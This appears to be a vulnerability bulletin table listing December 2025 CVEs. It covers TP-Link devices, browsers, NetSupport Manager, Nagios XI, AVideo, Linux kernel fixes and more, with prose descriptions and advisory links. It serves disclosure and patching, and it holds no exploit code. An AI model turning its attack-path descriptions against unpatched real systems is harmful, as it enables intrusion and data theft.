| TP-Link Systems Inc.--Tapo C210 | The TP-Link Tapo C210 V.1.8 app on iOS and Android exposes password hashes through an unauthenticated API response, allowing attackers to brute force the password in the local network. The issue can be mitigated through mobile application updates. Device firmware remains unchanged. | 2025-12-16 | not yet calculated | CVE-2025-14553 | https://apps.apple.com/us/app/tp-link-tapo/id1472718009 https://play.google.com/store/apps/details?id=com.tplink.iot https://www.tp-link.com/us/support/faq/4840/ |
| Perforce--Delphix Continuous Compliance | In Delphix Continuous Compliance version 2025.3.0 and later, following a recent bug fix to correctly handle CR+LF (Windows and DOS) End-of-Record (EOR) characters in delimited files, an issue was identified: using an incorrect EOR configuration can cause inaccurate parsing and leave personally identifiable information (PII) unmasked. | 2025-12-20 | not yet calculated | CVE-2025-14591 | https://portal.perforce.com/s/article/TB137 https://portal.perforce.com/s/cve/a91Qi000002fThdIAE/pii-leak-due-to-change-in-eor-handling |
| The Document Foundation--LibreOffice | An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle. By executing the bundled interpreter directly, the attacker's scripts run with the application's TCC privileges. In fixed versions, parent-constraints are used to allow only the main application to launch the interpreter with those permissions. This issue affects LibreOffice on macOS: from 25.2 before < 25.2.4. | 2025-12-15 | not yet calculated | CVE-2025-14714 | https://www.libreoffice.org/about-us/security/advisories/cve-2025-14714 |
| WatchGuard--Fireware OS | An Out-of-bounds Write vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer. This vulnerability affects Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including 12.11.5 and 2025.1 up to and including 2025.1.3. | 2025-12-19 | not yet calculated | CVE-2025-14733 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027 |
| TP-Link Systems Inc.--WA850RE | Command Injection vulnerability in TP-Link WA850RE (httpd modules) allows an authenticated adjacent attacker to inject arbitrary commands. This issue affects: ≤ WA850RE V2_160527, ≤ WA850RE V3_160922. | 2025-12-18 | not yet calculated | CVE-2025-14737 | https://www.tp-link.com/us/support/download/tl-wa850re/v2/#Firmware https://www.tp-link.com/us/support/download/tl-wa850re/v3/#Firmware https://blog.exodusintel.com/2022/06/23/tp-link-wa850re-remote-command-injection-vulnerability/ https://www.tp-link.com/us/support/faq/4848/ |
| TP-Link Systems Inc.--WA850RE | Improper authentication vulnerability in TP-Link WA850RE (httpd modules) allows unauthenticated attackers to download the configuration file. This issue affects: ≤ WA850RE V2_160527, ≤ WA850RE V3_160922. | 2025-12-18 | not yet calculated | CVE-2025-14738 | https://www.tp-link.com/us/support/download/tl-wa850re/v2/#Firmware https://www.tp-link.com/us/support/download/tl-wa850re/v3/#Firmware https://blog.exodusintel.com/2022/06/23/tp-link-wa850re-unauthenticated-configuration-disclosure-vulnerability/ https://www.tp-link.com/us/support/faq/4848/ |
| TP-Link Systems Inc.--WR940N and WR941ND | Access of Uninitialized Pointer vulnerability in TP-Link WR940N and WR941ND allows local unauthenticated attackers to execute a DoS attack and potentially achieve arbitrary code execution under the context of the 'root' user. This issue affects WR940N and WR941ND: ≤ WR940N v5 3.20.1 Build 200316, ≤ WR941ND v6 3.16.9 Build 151203. | 2025-12-18 | not yet calculated | CVE-2025-14739 | https://www.tp-link.com/us/support/download/tl-wr941nd/#Firmware https://www.tp-link.com/us/support/download/tl-wr940n/v5/#Firmware https://blog.exodusintel.com/2022/06/23/tp-link-wr940n-wr941nd-uninitialized-pointer-vulnerability/ https://www.tp-link.com/us/support/faq/4848/ |
| Mozilla--Firefox for iOS | Unicode RTLO characters could allow malicious websites to spoof filenames in the downloads UI for Firefox for iOS, potentially tricking users into saving files of an unexpected file type. This vulnerability affects Firefox for iOS < 144.0. | 2025-12-18 | not yet calculated | CVE-2025-14744 | https://bugzilla.mozilla.org/show_bug.cgi?id=1984683 https://www.mozilla.org/security/advisories/mfsa2025-97/ |
| Google--Chrome | Use after free in WebGPU in Google Chrome prior to 143.0.7499.147 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. | 2025-12-16 | not yet calculated | CVE-2025-14765 | https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_16.html https://issues.chromium.org/issues/448294721 |
| Google--Chrome | Out of bounds read and write in V8 in Google Chrome prior to 143.0.7499.147 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. | 2025-12-16 | not yet calculated | CVE-2025-14766 | https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_16.html https://issues.chromium.org/issues/466786677 |
| TECNO--Tecno Pova6 Pro 5G | The component com.transsion.tranfacmode.entrance.main.MainActivity in com.transsion.tranfacmode has no permission control and can be accessed by third-party apps which can construct intents to directly open adb debugging functionality without user interaction. | 2025-12-17 | not yet calculated | CVE-2025-14817 | https://security.tecno.com/SRC/securityUpdates https://security.tecno.com/SRC/blogdetail/434?lang=en_US |
| Mozilla--Firefox | Use-after-free in the Disability Access APIs component. This vulnerability affects Firefox < 146.0.1. | 2025-12-18 | not yet calculated | CVE-2025-14860 | https://bugzilla.mozilla.org/show_bug.cgi?id=2000597 https://www.mozilla.org/security/advisories/mfsa2025-98/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox 146. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 146.0.1. | 2025-12-18 | not yet calculated | CVE-2025-14861 | Memory safety bugs fixed in Firefox 146.0.1 https://www.mozilla.org/security/advisories/mfsa2025-98/ |
| pretix--pretix | Multiple API endpoints allowed access to other users' sensitive files, which were not intended to be accessible by UUID alone, to anyone who knew the UUID of the file. | 2025-12-19 | not yet calculated | CVE-2025-14881 | https://pretix.eu/about/en/blog/20251218-release-2025-10-1/ |
| pretix--pretix-offlinesales | An API endpoint allowed access to other users' sensitive files, which were not intended to be accessible by UUID alone, to anyone who knew the UUID of the file. | 2025-12-19 | not yet calculated | CVE-2025-14882 | https://pretix.eu/about/en/blog/20251218-release-2025-10-1/ |
| Johnson Controls--OpenBlue Workplace (formerly FM Systems) | Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information. | 2025-12-17 | not yet calculated | CVE-2025-26381 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-03 https://tyco.widen.net/view/pdf/xmejieec4b/JCI-PSA-2025-05.pdf?t.download=true&u=aiurfs |
| Linksys--Linksys | A stored cross-site scripting (XSS) vulnerability in the page_save component of Linksys E5600 V1.1.0.26 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the hostname and domainName parameters. | 2025-12-16 | not yet calculated | CVE-2025-29231 | https://github.com/JZP018/Vuln/blob/main/linsys/E5600/XSS_wan_name/XSS_wan_name.md https://github.com/Suryaandave/CVES/tree/main/CVE-2025-29231 |
| NetSupport Software--Manager | NetSupport Manager < 14.12.0001 contains an unauthenticated SQL injection vulnerability in its Connectivity Server/Gateway HTTPS request handling. The server evaluates request URIs using an unsanitized SQLite query against the FileLinks table in gateway.db. By injecting SQL through the LinkName/URI value, a remote attacker can control the FileName field used by the server to read and return files from disk, resulting in arbitrary local file disclosure. | 2025-12-15 | not yet calculated | CVE-2025-34179 | https://kb.netsupportsoftware.com/knowledge-base/updating-and-securing-netsupport-manager/ https://www.vulncheck.com/advisories/netsupport-manager-unauthenticated-sqli-local-file-disclosure https://ret2.me/post/2025-12-04-exploiting-netsupport-gateway/ |
| NetSupport Software--Manager | NetSupport Manager < 14.12.0001 relies on a shared Gateway Key for authentication between Manager/Control, Client, and Connectivity Server components. The key is stored using a reversible encoding scheme. An attacker who obtains access to a deployed client configuration file can decode the stored value to recover the plaintext Gateway Key. Possession of the Gateway Key allows unauthorized access to NetSupport Manager connectivity services and enables remote control of systems managed through the same key. | 2025-12-15 | not yet calculated | CVE-2025-34180 | https://kb.netsupportsoftware.com/knowledge-base/updating-and-securing-netsupport-manager/ https://www.vulncheck.com/advisories/netsupport-manager-gateway-key-reversible-encoding-credential-recovery https://ret2.me/post/2025-12-04-exploiting-netsupport-gateway/ |
| NetSupport Software--Manager | NetSupport Manager < 14.12.0001 contains an arbitrary file write vulnerability in its Connectivity Server/Gateway PUTFILE request handler. An attacker with a valid Gateway Key can supply a crafted filename containing directory traversal sequences to write files to arbitrary locations on the server. This can be leveraged to place attacker-controlled DLLs or executables in privileged paths and achieve remote code execution in the context of the NetSupport Manager connectivity service. | 2025-12-15 | not yet calculated | CVE-2025-34181 | https://kb.netsupportsoftware.com/knowledge-base/updating-and-securing-netsupport-manager/ https://www.vulncheck.com/advisories/netsupport-manager-authenticated-path-traversal-arbitrary-write-rce https://ret2.me/post/2025-12-04-exploiting-netsupport-gateway/ |
| Nagios Enterprises--Nagios XI | Nagios XI versions prior to 2026R1.1 are vulnerable to local privilege escalation due to an unsafe interaction between sudo permissions and application file permissions. A user-accessible maintenance script may be executed as root via sudo and includes an application file that is writable by a lower-privileged user. A local attacker with access to the application account can modify this file to introduce malicious code, which is then executed with elevated privileges when the script is run. Successful exploitation results in arbitrary code execution as the root user. | 2025-12-16 | not yet calculated | CVE-2025-34288 | https://www.nagios.com/changelog/nagios-xi/2026r1-1/ https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-writable-php-include-executed-with-sudo |
| Versa Networks--SASE Client for Windows | Versa SASE Client for Windows versions released between 7.8.7 and 7.9.4 contain a local privilege escalation vulnerability in the audit log export functionality. The client communicates user-controlled file paths to a privileged service, which performs file system operations without impersonating the requesting user. Due to improper privilege handling and a time-of-check time-of-use race condition combined with symbolic link and mount point manipulation, a local authenticated attacker can coerce the service into deleting arbitrary directories with SYSTEM privileges. This can be exploited to delete protected system folders such as C:\Config.msi and subsequently achieve execution as NT AUTHORITY\SYSTEM via MSI rollback techniques. | 2025-12-20 | not yet calculated | CVE-2025-34290 | https://security-portal.versa-networks.com/emailbulletins/69421e33d03aafc8e5bdaf21 https://www.vulncheck.com/advisories/versa-sase-client-for-windows-arbitrary-file-deletion-leading-to-lpe |
| EQS Group GmbH--Convercent Whistleblowing Platform | The Convercent Whistleblowing Platform operated by EQS Group exposes an unauthenticated API endpoint at /GetLegalEntity that returns internal customer legal-entity names based on a supplied searchText fragment. A remote unauthenticated attacker can query the endpoint using common legal-suffix terms to enumerate Convercent tenants, identifying organizations using the platform. This disclosure can facilitate targeted phishing, extortion, or other attacks against whistleblowing programs and reveals sensitive business relationships and compliance infrastructure. | 2025-12-15 | not yet calculated | CVE-2025-34411 | https://seclists.org/fulldisclosure/2025/Dec/4 https://www.convercent.com/ https://www.eqs.com/en-us/platform-convercent-clients/ https://www.vulncheck.com/advisories/convercent-whisteblowing-platform-unauthenticated-getlegalentity-endpoing-enables-customer-enumeration |
| EQS Group GmbH--Convercent Whistleblowing Platform | The Convercent Whistleblowing Platform operated by EQS Group contains a protection mechanism failure in its browser and session handling. By default, affected deployments omit HTTP security headers such as Content-Security-Policy, Referrer-Policy, Permissions-Policy, Cross-Origin-Embedder-Policy, Cross-Origin-Opener-Policy, and Cross-Origin-Resource-Policy, and implement incomplete clickjacking protections. The application also issues session cookies with insecure or inconsistent attributes by default, including duplicate ASP.NET_SessionId values, an affinity cookie missing the Secure attribute, and mixed or absent SameSite settings. These deficiencies weaken browser-side isolation and session integrity, increasing exposure to client-side attacks, session fixation, and cross-site session leakage. | 2025-12-15 | not yet calculated | CVE-2025-34412 | https://seclists.org/fulldisclosure/2025/Dec/4 https://www.convercent.com/ https://www.eqs.com/en-us/platform-convercent-clients/ https://www.vulncheck.com/advisories/convercent-whisteblowing-platform-protection-mechanism-failure-insecure-default-browser-and-session-controls |
| World Wide Broadcast Network--AVideo | AVideo versions 14.3.1 prior to 20.1 contain an unauthenticated remote code execution vulnerability caused by predictable generation of an installation salt using PHP uniqid(). The installation timestamp is exposed via a public endpoint, and a derived hash identifier is accessible through unauthenticated API responses, allowing attackers to brute-force the remaining entropy. The recovered salt can then be used to encrypt a malicious payload supplied to a notification API endpoint that evaluates attacker-controlled input, resulting in arbitrary code execution as the web server user. | 2025-12-19 | not yet calculated | CVE-2025-34433 | https://github.com/WWBN/AVideo/commit/4a53ab2 https://github.com/WWBN/AVideo/commit/a2bdbff https://www.vulncheck.com/advisories/avideo-unauthenticated-rce-via-predictable-installation-salt https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 with the ImageGallery plugin enabled are vulnerable to unauthenticated file upload and deletion. Plugin endpoints responsible for managing gallery images fail to enforce authentication checks and do not validate ownership, allowing unauthenticated attackers to upload or delete images associated with any image-based video. | 2025-12-17 | not yet calculated | CVE-2025-34434 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/c279999cbd https://www.vulncheck.com/advisories/avideo-imagegallery-plugin-unauthenticated-file-upload-and-deletion https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video. | 2025-12-17 | not yet calculated | CVE-2025-34435 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/275a54268b https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-deletion https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 allow any authenticated user to upload files into directories belonging to other users due to an insecure direct object reference. The upload functionality verifies authentication but does not enforce ownership checks. | 2025-12-17 | not yet calculated | CVE-2025-34436 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/c279999cbd https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-upload https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 permit any authenticated user to upload comment images to videos owned by other users. The endpoint validates authentication but omits ownership checks, allowing attackers to perform unauthorized uploads to arbitrary video objects. | 2025-12-17 | not yet calculated | CVE-2025-34437 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/d411f91805 https://www.vulncheck.com/advisories/avideo-idor-arbitrary-comment-image-upload https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 contain an insecure direct object reference vulnerability allowing users with upload permissions to modify the rotation metadata of any video. The endpoint verifies upload capability but fails to enforce ownership or management rights for the targeted video. | 2025-12-17 | not yet calculated | CVE-2025-34438 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/c2feaf25cb https://www.vulncheck.com/advisories/avideo-idor-arbirary-video-rotation https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 are vulnerable to an open redirect flaw due to missing validation of the cancelUri parameter during user login. An attacker can craft a link to redirect users to arbitrary external sites, enabling phishing attacks. | 2025-12-17 | not yet calculated | CVE-2025-34439 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/88bc40427b https://www.vulncheck.com/advisories/avideo-open-redirect-via-canceluri-parameter https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 contain an open redirect vulnerability caused by insufficient validation of the siteRedirectUri parameter during user registration. Attackers can redirect users to external sites, facilitating phishing attacks. | 2025-12-17 | not yet calculated | CVE-2025-34440 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/77c70019b0 https://www.vulncheck.com/advisories/avideo-open-redirect-via-siteredirecturi-parameter https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 expose sensitive user information through an unauthenticated public API endpoint. Responses include emails, usernames, administrative status, and last login times, enabling user enumeration and privacy violations. | 2025-12-17 | not yet calculated | CVE-2025-34441 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/1416c517e2 https://www.vulncheck.com/advisories/avideo-user-information-disclosure-via-public-api https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 disclose absolute filesystem paths via multiple public API endpoints. Returned metadata includes full server paths to media files, revealing underlying filesystem structure and facilitating more effective attack chains. | 2025-12-17 | not yet calculated | CVE-2025-34442 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/dbe3e91c54 https://www.vulncheck.com/advisories/avideo-system-path-disclosure-via-public-api https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| Genymobile--scrcpy | Genymobile/scrcpy versions up to and including 3.3.3 and prior to commit 3e40b24 contain a global buffer overflow vulnerability in the function sc_read32be, invoked via sc_device_msg_deserialize() and process_msgs(). Processing crafted device messages can cause reads beyond the bounds of a global buffer, leading to memory corruption or crashes. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations. | 2025-12-18 | not yet calculated | CVE-2025-34449 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-003-scrcpy-global-buffer-overflow.md https://github.com/Genymobile/scrcpy/issues/6415 https://github.com/Genymobile/scrcpy/commit/3e40b24 https://www.vulncheck.com/advisories/genymobile-scrcpy-global-buffer-overflow |
| merbanan--rtl_433 | merbanan/rtl_433 versions up to and including 25.02 and prior to commit 25e47f8 contain a stack-based buffer overflow vulnerability in the function parse_rfraw() located in src/rfraw.c. When processing crafted or excessively large raw RF input data, the application may write beyond the bounds of a stack buffer, resulting in memory corruption or a crash. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations. | 2025-12-18 | not yet calculated | CVE-2025-34450 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md https://github.com/merbanan/rtl_433/issues/3375 https://github.com/dd32/rtl_433/commit/25e47f8 https://www.vulncheck.com/advisories/merbanan-rtl-433-stack-based-buffer-overflow |
| rofl0r--proxychains-ng | rofl0r/proxychains-ng versions up to and including 4.17 and prior to commit cc005b7 contain a stack-based buffer overflow vulnerability in the function proxy_from_string() located in src/libproxychains.c. When parsing crafted proxy configuration entries containing overly long username or password fields, the application may write beyond the bounds of fixed-size stack buffers, leading to memory corruption or crashes. This vulnerability may allow denial of service and, under certain conditions, could be leveraged for further exploitation depending on the execution environment and applied mitigations. | 2025-12-18 | not yet calculated | CVE-2025-34451 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-008-proxychains-ng-stack-buffer-overflow-proxy_from_string.md https://github.com/rofl0r/proxychains-ng/issues/606 https://github.com/httpsgithu/proxychains-ng/commit/cc005b7 https://www.vulncheck.com/advisories/rofl0r-proxychains-ng-stack-based-buffer-overflow |
| Streama--Streama | Streama versions 1.10.0 through 1.10.5 and prior to commit b7c8767 contain a combination of path traversal and server-side request forgery (SSRF) vulnerabilities that allow an authenticated attacker to write arbitrary files to the server filesystem. The issue exists in the subtitle download functionality, where user-controlled parameters are used to fetch remote content and construct file paths without proper validation. By supplying a crafted subtitle download URL and a path traversal sequence in the file name, an attacker can write files to arbitrary locations on the server, potentially leading to remote code execution. | 2025-12-18 | not yet calculated | CVE-2025-34452 | https://github.com/streamaserver/streama/commit/b7c8767 https://chocapikk.com/posts/2025/streama-path-traversal-ssrf/ https://www.vulncheck.com/advisories/streama-subtitle-download-path-traversal-and-ssrf-leading-to-arbitrary-file-write |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() Fix incorrect use of PTR_ERR_OR_ZERO() in topology_parse_cpu_capacity() which causes the code to proceed with NULL clock pointers. The current logic uses !PTR_ERR_OR_ZERO(cpu_clk) which evaluates to true for both valid pointers and NULL, leading to potential NULL pointer dereference in clk_get_rate(). Per include/linux/err.h documentation, PTR_ERR_OR_ZERO(ptr) returns: "The error code within @ptr if it is an error pointer; 0 otherwise." This means PTR_ERR_OR_ZERO() returns 0 for both valid pointers AND NULL pointers. Therefore !PTR_ERR_OR_ZERO(cpu_clk) evaluates to true (proceed) when cpu_clk is either valid or NULL, causing clk_get_rate(NULL) to be called when of_clk_get() returns NULL. Replace with !IS_ERR_OR_NULL(cpu_clk) which only proceeds for valid pointers, preventing potential NULL pointer dereference in clk_get_rate(). | 2025-12-16 | not yet calculated | CVE-2025-40346 | https://git.kernel.org/stable/c/64da320252e43456cc9ec3055ff567f168467b37 https://git.kernel.org/stable/c/02fbea0864fd4a863671f5d418129258d7159f68 https://git.kernel.org/stable/c/a77f8434954cb1e9c42c3854e40855fdcf5ab235 https://git.kernel.org/stable/c/3373f263bb647fcc3b5237cfaef757633b9ee25e https://git.kernel.org/stable/c/45379303124487db3a81219af7565d41f498167f https://git.kernel.org/stable/c/3a01b2614e84361aa222f67bc628593987e5cdb2 https://git.kernel.org/stable/c/2eead19334516c8e9927c11b448fbe512b1f18a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: enetc: fix the deadlock of enetc_mdio_lock After applying the workaround for err050089, the LS1028A platform experiences RCU stalls on RT kernel. This issue is caused by the recursive acquisition of the read lock enetc_mdio_lock. Here list some of the call stacks identified under the enetc_poll path that may lead to a deadlock: enetc_poll -> enetc_lock_mdio -> enetc_clean_rx_ring OR napi_complete_done -> napi_gro_receive -> enetc_start_xmit -> enetc_lock_mdio -> enetc_map_tx_buffs -> enetc_unlock_mdio -> enetc_unlock_mdio After enetc_poll acquires the read lock, a higher-priority writer attempts to acquire the lock, causing preemption. The writer detects that a read lock is already held and is scheduled out. However, readers under enetc_poll cannot acquire the read lock again because a writer is already waiting, leading to a thread hang. Currently, the deadlock is avoided by adjusting enetc_lock_mdio to prevent recursive lock acquisition. | 2025-12-16 | not yet calculated | CVE-2025-40347 | https://git.kernel.org/stable/c/2781ca82ce8cad263d80b617addb727e6a84c9e5 https://git.kernel.org/stable/c/1f92f5bd057a4fad9dab6af17963cdd21e5da6ed https://git.kernel.org/stable/c/2e55a49dc3b2a6b23329e4fbbd8a5feb20e220aa https://git.kernel.org/stable/c/50bd33f6b3922a6b760aa30d409cae891cec8fb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slab: Avoid race on slab->obj_exts in alloc_slab_obj_exts If two competing threads enter alloc_slab_obj_exts() and one of them fails to allocate the object extension vector, it might override the valid slab->obj_exts allocated by the other thread with OBJEXTS_ALLOC_FAIL. This will cause the thread that lost this race and expects a valid pointer to dereference a NULL pointer later on. Update slab->obj_exts atomically using cmpxchg() to avoid slab->obj_exts overrides by racing threads. Thanks for Vlastimil and Suren's help with debugging. | 2025-12-16 | not yet calculated | CVE-2025-40348 | https://git.kernel.org/stable/c/c7af5300d78460fc5037ddc77113ba3dbfe77dc0 https://git.kernel.org/stable/c/7c34feda6a9a203c9744281f1b6671b7dad2012d https://git.kernel.org/stable/c/6ed8bfd24ce1cb31742b09a3eb557cd008533eec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: validate record offset in hfsplus_bmap_alloc hfsplus_bmap_alloc can trigger a crash if a record offset or length is larger than node_size [ 15.264282] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x887/0x8b0 [ 15.265192] Read of size 8 at addr ffff8881085ca188 by task test/183 [ 15.265949] [ 15.266163] CPU: 0 UID: 0 PID: 183 Comm: test Not tainted 6.17.0-rc2-gc17b750b3ad9 #14 PREEMPT(voluntary) [ 15.266165] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 15.266167] Call Trace: [ 15.266168] <TASK> [ 15.266169] dump_stack_lvl+0x53/0x70 [ 15.266173] print_report+0xd0/0x660 [ 15.266181] kasan_report+0xce/0x100 [ 15.266185] hfsplus_bmap_alloc+0x887/0x8b0 [ 15.266208] hfs_btree_inc_height.isra.0+0xd5/0x7c0 [ 15.266217] hfsplus_brec_insert+0x870/0xb00 [ 15.266222] __hfsplus_ext_write_extent+0x428/0x570 [ 15.266225] __hfsplus_ext_cache_extent+0x5e/0x910 [ 15.266227] hfsplus_ext_read_extent+0x1b2/0x200 [ 15.266233] hfsplus_file_extend+0x5a7/0x1000 [ 15.266237] hfsplus_get_block+0x12b/0x8c0 [ 15.266238] __block_write_begin_int+0x36b/0x12c0 [ 15.266251] block_write_begin+0x77/0x110 [ 15.266252] cont_write_begin+0x428/0x720 [ 15.266259] hfsplus_write_begin+0x51/0x100 [ 15.266262] cont_write_begin+0x272/0x720 [ 15.266270] hfsplus_write_begin+0x51/0x100 [ 15.266274] generic_perform_write+0x321/0x750 [ 15.266285] generic_file_write_iter+0xc3/0x310 [ 15.266289] __kernel_write_iter+0x2fd/0x800 [ 15.266296] dump_user_range+0x2ea/0x910 [ 15.266301] elf_core_dump+0x2a94/0x2ed0 [ 15.266320] vfs_coredump+0x1d85/0x45e0 [ 15.266349] get_signal+0x12e3/0x1990 [ 15.266357] arch_do_signal_or_restart+0x89/0x580 [ 15.266362] irqentry_exit_to_user_mode+0xab/0x110 [ 15.266364] asm_exc_page_fault+0x26/0x30 [ 15.266366] RIP: 0033:0x41bd35 [ 15.266367] Code: bc d1 f3 0f 7f 27 f3 0f 7f 6f 10 f3 0f 7f 77 20 f3 0f 7f 7f 30 49 83 c0 0f 49 29 d0 48 8d 7c 17 31 e9 9f 0b 00 00 66 0f ef c0 <f3> 0f 6f 0e f3 0f 6f 56 10 66 0f 74 c1 66 0f d7 d0 49 83 f8f [ 15.266369] RSP: 002b:00007ffc9e62d078 EFLAGS: 00010283 [ 15.266371] RAX: 00007ffc9e62d100 RBX: 0000000000000000 RCX: 0000000000000000 [ 15.266372] RDX: 00000000000000e0 RSI: 0000000000000000 RDI: 00007ffc9e62d100 [ 15.266373] RBP: 0000400000000040 R08: 00000000000000e0 R09: 0000000000000000 [ 15.266374] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 [ 15.266375] R13: 0000000000000000 R14: 0000000000000000 R15: 0000400000000000 [ 15.266376] </TASK> When calling hfsplus_bmap_alloc to allocate a free node, this function first retrieves the bitmap from header node and map node using node->page together with the offset and length from hfs_brec_lenoff ``` len = hfs_brec_lenoff(node, 2, &off16); off = off16; off += node->page_offset; pagep = node->page + (off >> PAGE_SHIFT); data = kmap_local_page(*pagep); ``` However, if the retrieved offset or length is invalid (i.e. exceeds node_size), the code may end up accessing pages outside the allocated range for this node. This patch adds proper validation of both offset and length before use, preventing out-of-bounds page access. Move is_bnode_offset_valid and check_and_correct_requested_length to hfsplus_fs.h, as they may be required by other functions. | 2025-12-16 | not yet calculated | CVE-2025-40349 | https://git.kernel.org/stable/c/f7d9f600c7c3ff5dab36181a388af55f2c95604c https://git.kernel.org/stable/c/40dfe7a4215a1f20842561ffaf5a6f83a987e75b https://git.kernel.org/stable/c/418e48cab99c52c1760636a4dbe464bf6db2018b https://git.kernel.org/stable/c/0058d20d76182861dbdd8fd6e2dd8d18d6d3becf https://git.kernel.org/stable/c/4f40a2b3969daf10dca4dea6f6dd0e813f79b227 https://git.kernel.org/stable/c/17ed51cfce6c62cffb97059ef392ad2e0245806e https://git.kernel.org/stable/c/068a46df3e6acc68fb9db0a6313ab379a11ecd6f https://git.kernel.org/stable/c/738d5a51864ed8d7a68600b8c0c63fe6fe5c4f20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ XDP programs can change the layout of an xdp_buff through bpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver cannot assume the size of the linear data area nor fragments. Fix the bug in mlx5 by generating skb according to xdp_buff after XDP programs run. Currently, when handling multi-buf XDP, the mlx5 driver assumes the layout of an xdp_buff to be unchanged. That is, the linear data area continues to be empty and fragments remain the same. This may cause the driver to generate erroneous skb or triggering a kernel warning. When an XDP program added linear data through bpf_xdp_adjust_head(), the linear data will be ignored as mlx5e_build_linear_skb() builds an skb without linear data and then pull data from fragments to fill the linear data area. When an XDP program has shrunk the non-linear data through bpf_xdp_adjust_tail(), the delta passed to __pskb_pull_tail() may exceed the actual nonlinear data size and trigger the BUG_ON in it. To fix the issue, first record the original number of fragments. If the number of fragments changes after the XDP program runs, rewind the end fragment pointer by the difference and recalculate the truesize. Then, build the skb with the linear data area matching the xdp_buff. Finally, only pull data in if there is non-linear data and fill the linear part up to 256 bytes. | 2025-12-16 | not yet calculated | CVE-2025-40350 | https://git.kernel.org/stable/c/8b051d7f530e8a5237da242fbeafef02fec6b813 https://git.kernel.org/stable/c/cb9edd583e23979ee546981be963ad5f217e8b18 https://git.kernel.org/stable/c/f2557d7fa38e9475b38588f5c124476091480f53 https://git.kernel.org/stable/c/87bcef158ac1faca1bd7e0104588e8e2956d10be |
